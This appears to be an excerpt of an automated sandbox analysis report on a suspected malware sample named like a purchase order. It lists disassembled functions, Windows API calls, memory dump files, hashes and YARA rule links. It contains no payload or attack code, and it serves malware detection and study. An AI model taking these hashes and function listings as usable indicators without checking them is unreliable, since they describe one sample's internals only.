                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem
                                                                  • String ID: 0
                                                                  • API String ID: 135850232-4108050209
                                                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                  Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                  • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                  • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                  • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                  Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                  • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                  • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                  • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                  Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 3375834691-2298589950
                                                                  • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                  • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                  • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                  • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                  Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: $<
                                                                  • API String ID: 4104443479-428540627
                                                                  • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                  • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                  • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                  • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                  Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID: \VH
                                                                  • API String ID: 1682464887-234962358
                                                                  • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                  • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                  • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                  • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                  Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID: \VH
                                                                  • API String ID: 1682464887-234962358
                                                                  • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                  • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                  • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                  • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                  Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID: \VH
                                                                  • API String ID: 1682464887-234962358
                                                                  • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                  • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                  • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                  • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                  Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume
                                                                  • String ID: \VH
                                                                  • API String ID: 2507767853-234962358
                                                                  • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                  • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                  • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                  • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                  Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume
                                                                  • String ID: \VH
                                                                  • API String ID: 2507767853-234962358
                                                                  • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                  • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                  • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                  • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                  Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                  • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                  • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                  • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                  • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                  Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                  • String ID: crts
                                                                  • API String ID: 943502515-3724388283
                                                                  • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                  • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                  Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                  • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                  • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$LabelVolume
                                                                  • String ID: \VH
                                                                  • API String ID: 2006950084-234962358
                                                                  • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                  • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                  • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                  • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                  Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • GetMenuItemInfoW.USER32 ref: 00449727
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                  • DrawMenuBar.USER32 ref: 00449761
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$InfoItem$Draw_malloc
                                                                  • String ID: 0
                                                                  • API String ID: 772068139-4108050209
                                                                  • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                  • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                  • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                  • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                  Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_wcscpy
                                                                  • String ID: 3, 3, 8, 1
                                                                  • API String ID: 3469035223-357260408
